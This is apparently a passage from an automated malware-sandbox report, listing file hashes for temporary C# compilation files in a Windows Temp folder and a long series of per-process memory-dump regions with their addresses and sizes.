                                                                          da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                          SHA256

                                                                          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                          SHA512

                                                                          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\5cu9m1jg.0.cs
                                                                          MD5

                                                                          b1da1ef961aa0ce50c236459261d955a

                                                                          SHA1

                                                                          99cf19f188248557193608fe42c1cb88fcf234e1

                                                                          SHA256

                                                                          139659d9c1d794242de8defb1e33c785b3b63a691230874656b2b1afc9e0b26b

                                                                          SHA512

                                                                          27c4e9d4d1926a87eb5a2cafd768d80a9d566c5fe9c7eb17f87453698415b30e251816738388c3171519a74b20ab0919c47c04a1e6cf9e1d82547540df5e1682

                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\5cu9m1jg.cmdline
                                                                          MD5

                                                                          de9a3f43e4412dc492ed382961ebbf22

                                                                          SHA1

                                                                          5cedb82dada9eefa088e17c4dd747a2b248f558f

                                                                          SHA256

                                                                          0a2919c4425d21640ca3e13f64f46157e0be0b313383f4a45063998c337ff583

                                                                          SHA512

                                                                          62f3857f99d855796bc247d2b571732126da9d11af197ecd677fc1891f743ef978a91af8f08ad3bd9029feced2fef801b4a407dfda8fbe7865302c5a34085ce9

                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\CSCAE78.tmp
                                                                          MD5

                                                                          d742ca11220a5e2f41c1f1dfd1ef68a1

                                                                          SHA1

                                                                          d53da3918a8cecd450c6c95d43476cefa601f4ec

                                                                          SHA256

                                                                          80241dafd6166dd0337cedfad7cf78e4130b26555febc15619b42cdfdc95c511

                                                                          SHA512

                                                                          ab14c45dbd19046555e43ab0df08ae5c1ce967850cbab07bd92d60ef632d1b5a56052a5ff14825a1066295187124c96c4061be950c0845a25c4e58821c81c762

                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\o4qsd3hb.0.cs
                                                                          MD5

                                                                          66d77ea7a947b910d56cfb0fc4b85be6

                                                                          SHA1

                                                                          9d503a2c0ddaee23a81802ca8444d8b7039ece6b

                                                                          SHA256

                                                                          66e86036222f5d3b474370bbba04c4a7decc42d05d25675846cba63f16877d8b

                                                                          SHA512

                                                                          a53181798e577abd31ee4063903e62171903b369b4ff26c337cc0108be8883bee39000a858fb24e92d13cdb89ef5782aadf06b7bd6807dd2d46458f813ee772b

                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\o4qsd3hb.cmdline
                                                                          MD5

                                                                          3cb15b91963d869fb1d5706b5d4bc18e

                                                                          SHA1

                                                                          71281654222b8de5e1eebd8226101769d4d17edd

                                                                          SHA256

                                                                          7a06d80121798a702bc77ccd40081f21c80ca83608dab355d1d268fe1d4f9159

                                                                          SHA512

                                                                          53825b718de717bfa34e1b01e1ec2101a9a6227b8f03f58f0971ca4ace8d7390fe43037ec5289d73b75940b23d2195eeb032754a8fe9eb71d85f6022b60764ac

                                                                        • memory/268-106-0x0000000000270000-0x0000000000271000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/268-105-0x0000000000000000-mapping.dmp
                                                                        • memory/268-108-0x0000000000400000-0x00000000004AF000-memory.dmp
                                                                          Filesize

                                                                          700KB

                                                                        • memory/272-157-0x0000000000000000-mapping.dmp
                                                                        • memory/288-114-0x0000000000000000-mapping.dmp
                                                                        • memory/520-149-0x0000000000000000-mapping.dmp
                                                                        • memory/668-89-0x0000000000000000-mapping.dmp
                                                                        • memory/668-103-0x0000000000420000-0x0000000000421000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/768-146-0x0000000000000000-mapping.dmp
                                                                        • memory/776-93-0x00000000001B0000-0x000000000026C000-memory.dmp
                                                                          Filesize

                                                                          752KB

                                                                        • memory/776-88-0x0000000000000000-mapping.dmp
                                                                        • memory/776-92-0x0000000000100000-0x0000000000101000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/940-127-0x0000000000000000-mapping.dmp
                                                                        • memory/960-162-0x0000000000000000-mapping.dmp
                                                                        • memory/976-98-0x0000000000000000-mapping.dmp
                                                                        • memory/980-90-0x00000000000A0000-0x00000000000A1000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/980-140-0x0000000000000000-mapping.dmp
                                                                        • memory/980-87-0x0000000000000000-mapping.dmp
                                                                        • memory/980-91-0x0000000000330000-0x00000000003EC000-memory.dmp
                                                                          Filesize

                                                                          752KB

                                                                        • memory/988-65-0x0000000002702000-0x0000000002704000-memory.dmp
                                                                          Filesize

                                                                          8KB

                                                                        • memory/988-67-0x000000000270B000-0x000000000272A000-memory.dmp
                                                                          Filesize

                                                                          124KB

                                                                        • memory/988-63-0x000007FEEDFF0000-0x000007FEEEB4D000-memory.dmp
                                                                          Filesize

                                                                          11.4MB

                                                                        • memory/988-66-0x0000000002704000-0x0000000002707000-memory.dmp
                                                                          Filesize

                                                                          12KB

                                                                        • memory/988-64-0x0000000002700000-0x0000000002702000-memory.dmp
                                                                          Filesize

                                                                          8KB

                                                                        • memory/988-61-0x0000000000000000-mapping.dmp
                                                                        • memory/988-85-0x000000001B1C0000-0x000000001B205000-memory.dmp
                                                                          Filesize

                                                                          276KB

                                                                        • memory/1012-95-0x0000000000000000-mapping.dmp
                                                                        • memory/1012-110-0x0000000000000000-mapping.dmp
                                                                        • memory/1084-130-0x0000000000000000-mapping.dmp
                                                                        • memory/1220-112-0x0000000000000000-mapping.dmp
                                                                        • memory/1244-119-0x0000000000000000-mapping.dmp
                                                                        • memory/1320-55-0x000007FEFB631000-0x000007FEFB633000-memory.dmp
                                                                          Filesize

                                                                          8KB

                                                                        • memory/1380-84-0x00000000026A0000-0x00000000026A1000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/1380-86-0x0000000005CB0000-0x0000000005D6C000-memory.dmp
                                                                          Filesize

                                                                          752KB

                                                                        • memory/1396-159-0x0000000000000000-mapping.dmp
                                                                        • memory/1464-132-0x0000000000000000-mapping.dmp
                                                                        • memory/1472-97-0x0000000000000000-mapping.dmp
                                                                        • memory/1536-109-0x0000000000420000-0x00000000004CF000-memory.dmp
                                                                          Filesize

                                                                          700KB

                                                                        • memory/1536-152-0x0000000000000000-mapping.dmp
                                                                        • memory/1536-104-0x0000000000000000-mapping.dmp
                                                                        • memory/1536-107-0x0000000000110000-0x0000000000111000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/1536-134-0x0000000000000000-mapping.dmp
                                                                        • memory/1544-96-0x0000000000000000-mapping.dmp
                                                                        • memory/1544-143-0x0000000000000000-mapping.dmp
                                                                        • memory/1552-68-0x0000000000000000-mapping.dmp
                                                                        • memory/1552-71-0x0000000000820000-0x0000000000822000-memory.dmp
                                                                          Filesize

                                                                          8KB

                                                                        • memory/1552-125-0x0000000000000000-mapping.dmp
                                                                        • memory/1584-129-0x0000000000000000-mapping.dmp
                                                                        • memory/1600-160-0x0000000000000000-mapping.dmp
                                                                        • memory/1608-139-0x0000000000000000-mapping.dmp
                                                                        • memory/1612-83-0x0000000001FA0000-0x0000000001FA2000-memory.dmp
                                                                          Filesize

                                                                          8KB

                                                                        • memory/1612-75-0x0000000000000000-mapping.dmp
                                                                        • memory/1628-120-0x0000000000000000-mapping.dmp
                                                                        • memory/1628-137-0x0000000000000000-mapping.dmp
                                                                        • memory/1672-78-0x0000000000000000-mapping.dmp
                                                                        • memory/1688-115-0x0000000000000000-mapping.dmp
                                                                        • memory/1724-94-0x0000000000000000-mapping.dmp
                                                                        • memory/1784-117-0x0000000000000000-mapping.dmp
                                                                        • memory/1900-72-0x0000000000000000-mapping.dmp
                                                                        • memory/1912-155-0x0000000000000000-mapping.dmp
                                                                        • memory/1920-135-0x0000000000000000-mapping.dmp
                                                                        • memory/1924-145-0x0000000000000000-mapping.dmp
                                                                        • memory/1944-151-0x0000000000000000-mapping.dmp
                                                                        • memory/1952-59-0x0000000010000000-0x00000000101B8000-memory.dmp
                                                                          Filesize

                                                                          1.7MB

                                                                        • memory/1952-58-0x00000000001D0000-0x00000000001D1000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/1952-57-0x0000000074B21000-0x0000000074B23000-memory.dmp
                                                                          Filesize

                                                                          8KB

                                                                        • memory/1952-56-0x0000000000000000-mapping.dmp
                                                                        • memory/1960-141-0x0000000000000000-mapping.dmp
                                                                        • memory/1976-124-0x0000000000000000-mapping.dmp
                                                                        • memory/1988-122-0x0000000000000000-mapping.dmp
                                                                        • memory/1992-154-0x0000000000000000-mapping.dmp
                                                                        • memory/2016-147-0x0000000000000000-mapping.dmp
                                                                        • memory/2016-100-0x0000000000000000-mapping.dmp